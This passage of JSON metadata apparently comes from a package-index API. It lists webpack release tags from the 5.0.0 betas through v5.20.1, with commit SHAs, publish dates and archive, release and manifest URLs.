z/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"